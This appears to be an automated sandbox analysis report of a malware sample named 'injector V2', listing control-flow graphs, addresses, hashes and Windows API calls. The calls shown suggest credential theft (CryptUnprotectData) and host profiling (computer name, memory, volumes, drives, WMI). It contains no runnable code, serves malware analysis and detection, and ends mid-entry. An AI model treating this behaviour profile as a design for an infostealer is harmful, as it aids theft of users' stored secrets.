12209->12210 12211 438bef SysAllocString 12209->12211 12210->12208 12213 438ce0 12211->12213 12213->12213 12214 438d14 SysAllocString 12213->12214 12216 438d37 12214->12216 12215 438f25 SysFreeString SysFreeString 12215->12210 12216->12215 12217 438f14 12216->12217 12218 438d7b VariantInit 12216->12218 12217->12215 12220 438de0 12218->12220 12219 438f03 VariantClear 12219->12217 12220->12219 12221 432390 12224 418480 12221->12224 12223 432395 CoSetProxyBlanket 12224->12223 12225 40d293 CoInitializeSecurity 12226 43dc95 12227 43dca2 12226->12227 12227->12227 12228 43dd7e 12227->12228 12230 43d920 LdrInitializeThunk 12227->12230 12230->12228 12393 42e434 12394 42e446 12393->12394 12395 42e4f5 GetPhysicallyInstalledSystemMemory 12394->12395 12396 42e519 12395->12396 12396->12396 12231 42dd55 12232 42dd74 12231->12232 12233 42de60 GetComputerNameExA 12232->12233 12234 42deb0 GetComputerNameExA 12233->12234 12236 42df90 12234->12236 12236->12236 12397 40dcff 12398 40dd90 12397->12398 12400 40ddde 12398->12400 12401 43d920 LdrInitializeThunk 12398->12401 12401->12400

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4389d0-438a34 1 438a40-438a9b 0->1 1->1 2 438a9d-438ab9 1->2 4 438ac6-438b14 CoCreateInstance 2->4 5 438abb 2->5 6 438f56-438f7b call 43f550 GetVolumeInformationW 4->6 7 438b1a-438b5b 4->7 5->4 12 438f85-438f87 6->12 13 438f7d-438f81 6->13 9 438b60-438b9c 7->9 9->9 11 438b9e-438bc9 SysAllocString 9->11 18 438f45-438f52 SysFreeString 11->18 19 438bcf-438be9 CoSetProxyBlanket 11->19 14 438f9f-438fa6 12->14 13->12 16 438fb2-438fff call 41f900 14->16 17 438fa8-438faf 14->17 26 439000-43900b 16->26 17->16 18->6 21 438f3b-438f41 19->21 22 438bef-438c08 19->22 21->18 23 438c10-438c4d 22->23 23->23 25 438c4f-438cd5 SysAllocString 23->25 27 438ce0-438d12 25->27 26->26 28 43900d-439019 26->28 27->27 29 438d14-438d39 SysAllocString 27->29 30 438f90-438f99 28->30 31 43901f-43902f call 408400 28->31 36 438f25-438f37 SysFreeString * 2 29->36 37 438d3f-438d61 29->37 30->14 33 439034-43903b 30->33 31->30 36->21 39 438d67-438d6a 37->39 40 438f1b-438f21 37->40 39->40 41 438d70-438d75 39->41 40->36 41->40 42 438d7b-438dd1 VariantInit 41->42 43 438de0-438e1c 42->43 43->43 44 438e1e-438e33 43->44 45 438e37-438e39 44->45 46 438f03-438f14 VariantClear 45->46 47 438e3f-438e45 45->47 46->40 47->46 48 438e4b-438e58 47->48 49 438e5a-438e5f 48->49 50 438e9d 48->50 52 438e7c-438e80 49->52 53 438e9f-438ec6 call 408380 call 42ec40 50->53 54 438e82-438e8b 52->54 55 438e70 52->55 64 438ec8 53->64 65 438ecd-438edd 53->65 58 438e92-438e96 54->58 59 438e8d-438e90 54->59 57 438e71-438e7a 55->57 57->52 57->53 58->57 61 438e98-438e9b 58->61 59->57 61->57 64->65 66 438ee4-438f00 call 4083b0 call 408390 65->66 67 438edf 65->67 66->46 67->66
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00443678,00000000,00000001,00443668,00000000), ref: 00438B0C
                                                                                    • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438BA3
                                                                                    • CoSetProxyBlanket.COMBASE(00006F68,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438BE1
                                                                                    • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438C50
                                                                                    • SysAllocString.OLEAUT32(79CB7BB2), ref: 00438D15
                                                                                    • VariantInit.OLEAUT32(?), ref: 00438D80
                                                                                    • VariantClear.OLEAUT32(?), ref: 00438F04
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00438F2F
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00438F35
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00438F46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                    • String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
                                                                                    • API String ID: 2485776651-621965088
                                                                                    • Opcode ID: 9396cb8f17d18c9f60335c4eb3dae25d3e470e3c7ae8411d7b2ccb259684225f
                                                                                    • Instruction ID: 78e83211301507079be73e4fe13c709d001eec66ed3dbdc862d3520982de3262
                                                                                    • Opcode Fuzzy Hash: 9396cb8f17d18c9f60335c4eb3dae25d3e470e3c7ae8411d7b2ccb259684225f
                                                                                    • Instruction Fuzzy Hash: 4EF10EB2A083009BD310DF65C885B5BFBE5EFC9704F148A2DF5959B290D778D906CB86

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 217 418be3-418bf7 call 408390 220 418bfd-418c02 217->220 221 418cbe 217->221 222 418cc5-418d29 call 408380 220->222 221->222 225 418d30-418d98 222->225 225->225 226 418d9a-418da6 225->226 227 418dc1-418dd1 226->227 228 418da8-418daf 226->228 230 418df1-418e15 call 43ff30 227->230 231 418dd3-418dda 227->231 229 418db0-418dbf 228->229 229->227 229->229 235 418e40-418e62 call 440280 230->235 236 418ee0-418efa 230->236 237 418e22-418e28 call 408390 230->237 238 418ea5 230->238 239 418e69-418e89 call 408380 call 440350 230->239 240 418eab-418eb1 call 408390 230->240 241 418e31 230->241 242 418eb4-418eb6 230->242 243 418e37-418e3d call 408390 230->243 244 418ed7-418edd call 408390 230->244 245 418ebb-418ecf call 401000 230->245 246 418e9d 230->246 247 418e1c 230->247 232 418de0-418def 231->232 232->230 232->232 235->236 235->239 235->244 235->245 235->246 255 418f00-418f26 236->255 237->241 238->240 270 418e8e-418e96 239->270 240->242 241->243 254 41c6fc-41c703 242->254 243->235 244->236 245->244 246->238 247->237 255->255 263 418f28-418f30 255->263 267 418f32-418f41 263->267 268 418f7a-418fe3 call 401940 263->268 271 418f50-418f57 267->271 279 418ff0-419030 268->279 270->236 270->244 270->245 270->246 273 419060-419062 270->273 274 419240 270->274 275 419252-4192d1 270->275 276 418f60-418f66 271->276 277 418f59-418f5c 271->277 280 419070-419076 273->280 285 419246-41924f call 408390 274->285 281 4192e0-41935a 275->281 276->268 278 418f68-418f77 call 43d920 276->278 277->271 282 418f5e 277->282 278->268 279->279 284 419032-419059 call 401a80 279->284 280->280 286 419078-4190a0 280->286 281->281 287 41935c-41937a call 401a80 281->287 282->268 284->273 284->274 284->275 285->275 291 4190a2-4190a5 286->291 292 4190a7 286->292 300 419381-41938d 287->300 301 419394-4193ef 287->301 291->292 296 4190a8-4190b4 291->296 292->296 298 4190b6-4190b9 296->298 299 4190bb 296->299 298->299 302 4190bc-4190d6 call 408380 298->302 299->302 300->275 300->285 300->300 300->301 303 4193f0-419415 301->303 308 4191da-419239 call 43f550 CryptUnprotectData 302->308 309 4190dc-4190e3 302->309 303->303 305 419417-41943b call 401ab0 303->305 313 419720 305->313 314 4197a0 305->314 315 419540-419549 call 408390 305->315 316 419442-419481 305->316 317 4196c7-4196fe call 41df00 305->317 318 419726-41972e 305->318 319 419706-41970f call 408390 305->319 320 41976b-419773 305->320 321 41954c-41955c 305->321 322 41952e 305->322 323 4196b3-4196c0 305->323 324 419515-419525 call 401bb0 305->324 325 419534-419539 305->325 326 419574-41958b call 401af0 305->326 308->236 308->239 308->244 308->245 308->246 308->273 308->274 308->275 312 419100-419146 call 41ed80 * 2 309->312 364 4190f0-4190fa 312->364 365 419148-419163 call 41ed80 312->365 314->254 315->321 336 419490-4194aa 316->336 317->319 333 419751-419756 318->333 334 419730-419734 318->334 319->313 337 419760 320->337 338 419775-419779 320->338 327 41955d-41956d call 401ae0 321->327 322->325 323->313 323->314 323->315 323->317 323->318 323->319 323->320 323->321 323->322 324->322 325->327 351 4195e0 326->351 352 41958d-419592 326->352 327->313 327->314 327->315 327->317 327->318 327->319 327->320 327->321 327->322 327->323 327->324 327->326 333->320 346 419740-41974f 334->346 336->336 348 4194ac-419511 call 41df00 336->348 337->320 349 419780-41978f 338->349 346->333 346->346 348->324 349->349 355 419791 349->355 357 4195e2-4195ea 351->357 356 4195a9-4195b7 352->356 355->337 360 4195a0 356->360 361 4195b9-4195bb 356->361 362 419600 357->362 363 4195ec-4195f1 357->363 366 4195a1-4195a7 360->366 361->360 367 4195bd-4195c8 361->367 368 419607-41962b call 408380 call 40ad30 362->368 363->368 364->308 364->312 365->364 373 419165-41918e 365->373 366->356 366->357 367->360 371 4195ca-4195d3 367->371 381 419631-419646 call 408380 368->381 382 41962d-41962f 368->382 371->366 374 4195d5-4195d8 371->374 376 419194-4191aa call 41ed80 373->376 377 4190e9-4190ef 373->377 374->366 385 4191b0-4191d5 376->385 386 4190e5 376->386 377->364 388 419661-419673 381->388 389 419648-41964f 381->389 382->381 385->364 386->377 391 419691-41969f call 4400e0 388->391 392 419675-419678 388->392 390 419650-41965f 389->390 390->388 390->390 395 4196a4-4196ac 391->395 393 419680-41968f 392->393 393->391 393->393 395->313 395->314 395->315 395->317 395->318 395->319 395->320 395->321 395->322 395->323
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$7654$??;4$^$z
                                                                                    • API String ID: 0-2567570624
                                                                                    • Opcode ID: 9ec0e6aff255a45d3c2ce9d53ddb9f719d78b7d2f6d3ba07001a99e0c1e98cf1
                                                                                    • Instruction ID: b1bab82a719bfbb6248ae59022c6f20018a5e48ecd229fcddef7335a908d3544
                                                                                    • Opcode Fuzzy Hash: 9ec0e6aff255a45d3c2ce9d53ddb9f719d78b7d2f6d3ba07001a99e0c1e98cf1
                                                                                    • Instruction Fuzzy Hash: 234204B5A083418BD724CF24D8517EBB7E2EFCA304F08492EE4C987391E7399955CB5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 396 408ae0-408af1 call 43c680 399 408d34-408d36 ExitProcess 396->399 400 408af7-408b0f SHGetSpecialFolderPathW call 435ea0 396->400 403 408b15-408b4a GetCurrentThreadId GetCurrentProcessId 400->403 404 408d2f call 43d860 400->404 405 408b54-408c76 GetForegroundWindow 403->405 406 408b4c-408b52 403->406 404->399 408 408d0b-408d23 call 40a0f0 405->408 409 408c7c-408ced 405->409 406->405 408->404 414 408d25 call 40d260 408->414 410 408cf3-408d09 409->410 411 408cef-408cf1 409->411 410->408 411->410 416 408d2a call 40bf10 414->416 416->404
                                                                                    APIs
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B02
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408B15
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408B1D
                                                                                    • GetForegroundWindow.USER32 ref: 00408C6E
                                                                                    • ExitProcess.KERNEL32 ref: 00408D36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4063528623-0
                                                                                    • Opcode ID: e99b9c22fb25575f9126c025eed0440529ca7e6e2d35627aad7f0ff0fd22502f
                                                                                    • Instruction ID: 3916312ac2da3a89c62ac9926c891368b4596cef17ec7d1c1499a6de1a4fdd47
                                                                                    • Opcode Fuzzy Hash: e99b9c22fb25575f9126c025eed0440529ca7e6e2d35627aad7f0ff0fd22502f
                                                                                    • Instruction Fuzzy Hash: 67510473B5471447C708EEBE9D8139AB6D39BC8610F0E853DA888DB395ED789C0946C9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 422 424470-4244cf 423 4244d0-424532 422->423 423->423 424 424534-424588 423->424 426 424590-4245fb 424->426 426->426 427 4245fd-42460b 426->427 428 424612-424618 427->428 429 424672-42467b 427->429 430 4247c0 427->430 431 4247b0-4247b7 427->431 432 4247c6-424885 427->432 433 424654 427->433 434 424665-424671 427->434 435 42465c-424662 call 408390 427->435 436 424621 428->436 437 42461a-42461f 428->437 440 424684 429->440 441 42467d-424682 429->441 431->430 438 424890-4248ea 432->438 433->435 435->434 443 424624-42464d call 408380 436->443 437->443 438->438 444 4248ec-42490a call 4228a0 438->444 442 42468b-4246cf call 408380 440->442 441->442 452 4246d0-42472d 442->452 443->429 443->430 443->431 443->432 443->433 443->434 443->435 455 42492d-4249f7 call 408380 444->455 452->452 453 42472f-42473a 452->453 456 424761-42476e 453->456 457 42473c-424741 453->457 464 424a00-424a14 455->464 460 424770-424774 456->460 461 424791-42479c call 4400e0 456->461 459 424750-42475f 457->459 459->456 459->459 463 424780-42478f 460->463 467 4247a1-4247a9 461->467 463->461 463->463 464->464 466 424a16-424a1e 464->466 468 424a20-424a25 466->468 469 424a41-424a4e 466->469 467->430 467->431 467->432 467->455 470 424a8a-424a98 467->470 473 424a30-424a3f 468->473 474 424a50-424a54 469->474 475 424a71-424a87 GetLogicalDrives call 4400e0 469->475 471 424a9a 470->471 472 424a9f-424b4e call 408380 470->472 471->472 481 424b50-424b64 472->481 473->469 473->473 478 424a60-424a6f 474->478 475->470 478->475 478->478 481->481 482 424b66-424b6e 481->482 483 424b70-424b75 482->483 484 424b91-424b9e 482->484 485 424b80-424b8f 483->485 486 424ba0-424ba4 484->486 487 424bc1-424bd7 GetLogicalDrives call 4400e0 484->487 485->484 485->485 489 424bb0-424bbf 486->489 489->487 489->489
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \]$KB
                                                                                    • API String ID: 0-282600260
                                                                                    • Opcode ID: 92c44fe8c1f774e4af65f77713d3c0eb1963ab35570d33be9f0bae4b12a83995
                                                                                    • Instruction ID: 3fab9b1554da2861af45bec0a6cd50a870c70bd336575c68554a47ef3370b67c
                                                                                    • Opcode Fuzzy Hash: 92c44fe8c1f774e4af65f77713d3c0eb1963ab35570d33be9f0bae4b12a83995
                                                                                    • Instruction Fuzzy Hash: 58021FB66083508FD314CF68E89166BBBE5EFC5314F08892DE9D98B351E778C905CB86

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 491 42dd55-42ddb3 call 43f550 495 42ddc0-42dde4 491->495 495->495 496 42dde6-42ddef 495->496 497 42ddf1-42ddf9 496->497 498 42de0d 496->498 499 42de00-42de09 497->499 500 42de0f-42de1d 498->500 499->499 501 42de0b 499->501 502 42de1f-42de27 500->502 503 42de3d 500->503 501->500 504 42de30-42de39 502->504 505 42de3f-42deaf call 43f550 GetComputerNameExA 503->505 504->504 506 42de3b 504->506 510 42deb0-42ded3 505->510 506->505 510->510 511 42ded5-42dede 510->511 512 42dee0-42dee8 511->512 513 42defd 511->513 514 42def0-42def9 512->514 515 42deff-42df0d 513->515 514->514 516 42defb 514->516 517 42df0f-42df17 515->517 518 42df2d 515->518 516->515 520 42df20-42df29 517->520 519 42df2f-42df8b GetComputerNameExA 518->519 521 42df90-42dfb3 519->521 520->520 522 42df2b 520->522 521->521 523 42dfb5-42dfbe 521->523 522->519 524 42dfc0-42dfc8 523->524 525 42dfdd 523->525 526 42dfd0-42dfd9 524->526 527 42dfdf-42dfeb 525->527 526->526 528 42dfdb 526->528 529 42e00b-42e06f 527->529 530 42dfed-42dff3 527->530 528->527 533 42e070-42e08d 529->533 531 42e000-42e009 530->531 531->529 531->531 533->533 534 42e08f-42e098 533->534 535 42e09a 534->535 536 42e0ab-42e0b7 534->536 537 42e0a0-42e0a9 535->537 538 42e0cb-42e12a call 43f550 536->538 539 42e0b9-42e0bf 536->539 537->536 537->537 544 42e130-42e154 538->544 540 42e0c0-42e0c9 539->540 540->538 540->540 544->544 545 42e156-42e15f 544->545 546 42e161-42e169 545->546 547 42e17d 545->547 548 42e170-42e179 546->548 549 42e17f-42e18e 547->549 548->548 552 42e17b 548->552 550 42e2b4-42e302 549->550 551 42e194-42e19b 549->551 554 42e310-42e338 550->554 553 42e1a0-42e1ad 551->553 552->549 555 42e1c0-42e1c6 553->555 556 42e1af-42e1b4 553->556 554->554 557 42e33a-42e347 554->557 559 42e210-42e21c 555->559 560 42e1c8-42e1cb 555->560 558 42e1e2 556->558 561 42e35b-42e35e call 4319a0 557->561 562 42e349-42e34f 557->562 564 42e1e5-42e1f5 558->564 567 42e270-42e278 559->567 568 42e21e-42e221 559->568 560->559 563 42e1cd-42e1df 560->563 570 42e363-42e37f 561->570 565 42e350-42e359 562->565 563->558 569 42e1f7-42e1fd 564->569 565->561 565->565 572 42e282-42e285 567->572 573 42e27a-42e27d 567->573 568->567 571 42e223-42e26b 568->571 569->550 576 42e203-42e205 569->576 571->564 574 42e287-42e2a8 572->574 575 42e2ad-42e2af 572->575 573->569 574->558 575->558 576->553 577 42e207 576->577 577->550
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DE80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: .L6k$FPX&
                                                                                    • API String ID: 3545744682-1030031352
                                                                                    • Opcode ID: e4f428f509ff5e6cb3c19bb6ef7fce41a7fd2c9908bb1c38f3bc447a5a6f9b72
                                                                                    • Instruction ID: aa173f05b44665317560c1bde112a0d19c6c7f5019f39f8cf5563b23ce8c7574
                                                                                    • Opcode Fuzzy Hash: e4f428f509ff5e6cb3c19bb6ef7fce41a7fd2c9908bb1c38f3bc447a5a6f9b72
                                                                                    • Instruction Fuzzy Hash: 71E1D570604B908EE725CF3694507B3BBE1AF57304F58899ED0EB8B382D7796506CB25

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 578 42dd4e-42de5b call 43f550 581 42de60-42deaf GetComputerNameExA 578->581 582 42deb0-42ded3 581->582 582->582 583 42ded5-42dede 582->583 584 42dee0-42dee8 583->584 585 42defd 583->585 586 42def0-42def9 584->586 587 42deff-42df0d 585->587 586->586 588 42defb 586->588 589 42df0f-42df17 587->589 590 42df2d 587->590 588->587 592 42df20-42df29 589->592 591 42df2f-42df8b GetComputerNameExA 590->591 593 42df90-42dfb3 591->593 592->592 594 42df2b 592->594 593->593 595 42dfb5-42dfbe 593->595 594->591 596 42dfc0-42dfc8 595->596 597 42dfdd 595->597 598 42dfd0-42dfd9 596->598 599 42dfdf-42dfeb 597->599 598->598 600 42dfdb 598->600 601 42e00b-42e06f 599->601 602 42dfed-42dff3 599->602 600->599 605 42e070-42e08d 601->605 603 42e000-42e009 602->603 603->601 603->603 605->605 606 42e08f-42e098 605->606 607 42e09a 606->607 608 42e0ab-42e0b7 606->608 609 42e0a0-42e0a9 607->609 610 42e0cb-42e12a call 43f550 608->610 611 42e0b9-42e0bf 608->611 609->608 609->609 616 42e130-42e154 610->616 612 42e0c0-42e0c9 611->612 612->610 612->612 616->616 617 42e156-42e15f 616->617 618 42e161-42e169 617->618 619 42e17d 617->619 620 42e170-42e179 618->620 621 42e17f-42e18e 619->621 620->620 624 42e17b 620->624 622 42e2b4-42e302 621->622 623 42e194-42e19b 621->623 626 42e310-42e338 622->626 625 42e1a0-42e1ad 623->625 624->621 627 42e1c0-42e1c6 625->627 628 42e1af-42e1b4 625->628 626->626 629 42e33a-42e347 626->629 631 42e210-42e21c 627->631 632 42e1c8-42e1cb 627->632 630 42e1e2 628->630 633 42e35b-42e35e call 4319a0 629->633 634 42e349-42e34f 629->634 636 42e1e5-42e1f5 630->636 639 42e270-42e278 631->639 640 42e21e-42e221 631->640 632->631 635 42e1cd-42e1df 632->635 642 42e363-42e37f 633->642 637 42e350-42e359 634->637 635->630 641 42e1f7-42e1fd 636->641 637->633 637->637 644 42e282-42e285 639->644 645 42e27a-42e27d 639->645 640->639 643 42e223-42e26b 640->643 641->622 648 42e203-42e205 641->648 643->636 646 42e287-42e2a8 644->646 647 42e2ad-42e2af 644->647 645->641 646->630 647->630 648->625 649 42e207 648->649 649->622
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DE80
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042DF4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: .L6k$FPX&
                                                                                    • API String ID: 3545744682-1030031352
                                                                                    • Opcode ID: e7c65ce7ee6dba4e03b97e26cea1270ebfb7e3713e142d4a7c7104a1b6d57e82
                                                                                    • Instruction ID: 10d9fc797a3d32074fbf503759531678fa863e0e0eb484848d36d90dfdfb2c32
                                                                                    • Opcode Fuzzy Hash: e7c65ce7ee6dba4e03b97e26cea1270ebfb7e3713e142d4a7c7104a1b6d57e82
                                                                                    • Instruction Fuzzy Hash: 68E11760604B918EE725CF3684507B3FBD1AF57304F5889AED0EB8B382D739A506CB65

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 706 433d60-433e41 call 418480 GetSystemMetrics * 2 714 433e48-433ee1 706->714
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 4116985748-3916222277
                                                                                    • Opcode ID: e9068b8d1614f4b80017da7546eef902585b1e5db0b070eadc14fc91bf75c29b
                                                                                    • Instruction ID: a50777ac19fecff43adaad195f11a4007055434038bf7e073da212d0a6619a29
                                                                                    • Opcode Fuzzy Hash: e9068b8d1614f4b80017da7546eef902585b1e5db0b070eadc14fc91bf75c29b
                                                                                    • Instruction Fuzzy Hash: 595192B4E142089FDB40EFACD985A9EBBF0BB88700F10852DE498E7350D734A944CF96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 728 42e434-42e444 729 42e446-42e45b 728->729 730 42e4b9 728->730 733 42e460-42e47a 729->733 731 42e4d1-42e514 call 43f550 GetPhysicallyInstalledSystemMemory call 41f900 730->731 732 42e4bb-42e4bf 730->732 743 42e519-42e53f 731->743 735 42e4c0-42e4cd 732->735 733->733 734 42e47c-42e487 733->734 737 42e4ab-42e4b7 734->737 738 42e489-42e491 734->738 735->735 739 42e4cf 735->739 737->730 741 42e4a0-42e4a9 738->741 739->731 741->737 741->741 744 42e540-42e593 743->744 744->744 745 42e595-42e5bf 744->745 746 42e5c0-42e5da 745->746 746->746 747 42e5dc-42e5e5 746->747 748 42e5e7-42e5ed 747->748 749 42e5fd 747->749 750 42e5f0-42e5f9 748->750 751 42e600-42e608 749->751 750->750 752 42e5fb 750->752 753 42e60a-42e60b 751->753 754 42e61b-42e627 751->754 752->751 755 42e610-42e619 753->755 756 42e63b-42e67b 754->756 757 42e629-42e62f 754->757 755->754 755->755 759 42e680-42e69a 756->759 758 42e630-42e639 757->758 758->756 758->758 759->759 760 42e69c-42e6a5 759->760 761 42e6a7-42e6af 760->761 762 42e6bb-42e6c4 760->762 765 42e6b0-42e6b9 761->765 763 42e6c6-42e6c9 762->763 764 42e6db-42e75f 762->764 766 42e6d0-42e6d9 763->766 765->762 765->765 766->764 766->766
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E4FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID: o|Nx
                                                                                    • API String ID: 3960555810-802042616
                                                                                    • Opcode ID: 55090ea056dc510aa62f610828e46d5bdb31a3fa47c9b38dc9210595f8b174c3
                                                                                    • Instruction ID: f503bf91390e6fbe3390ce4816fb64252292ae4852dd66876ced69c528ecd60c
                                                                                    • Opcode Fuzzy Hash: 55090ea056dc510aa62f610828e46d5bdb31a3fa47c9b38dc9210595f8b174c3
                                                                                    • Instruction Fuzzy Hash: B291D970508B918FD725CF3A94607A3BBE1AF53304F5849AEC0DB87782D779A40ACB54
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043D8EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 6f68be6ec956a6583a85b5b43e644dfcdb69abe17a7243014ccb1c04c9939d51
                                                                                    • Instruction ID: 0b3d3b0c0615522f10db29576abadf12e02e27a3a625570a85f481a160202f54
                                                                                    • Opcode Fuzzy Hash: 6f68be6ec956a6583a85b5b43e644dfcdb69abe17a7243014ccb1c04c9939d51
                                                                                    • Instruction Fuzzy Hash: FD0128B1E062018BD318AF75EC51B2BB766EFCA300F08993DE98193241E638D8558796
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(00411AA3), ref: 0043D94E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: @
                                                                                    • API String ID: 2994545307-2766056989
                                                                                    • Opcode ID: 0475917a1a8bbe351991b2093614af9c6e3f5bd09f22263d332902a3f21969f9
                                                                                    • Instruction ID: 4b259642c4a6d7a99f9af5d21d433992198207b2e4a927d98d07ded2539b41dd
                                                                                    • Opcode Fuzzy Hash: 0475917a1a8bbe351991b2093614af9c6e3f5bd09f22263d332902a3f21969f9
                                                                                    • Instruction Fuzzy Hash: 6631FF716083048BD314DF68D8C1A6BFBF4FF8A304F15892DE68987391E7789918CB5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e2e4a7a582348601e141d1a64f92d77e41cde39af5ebceb16fd8896977840cd7
                                                                                    • Instruction ID: ad44c87781cf1a8a43f37b6594503ed622ccc9cc0f27c007faec6592b3e66a25
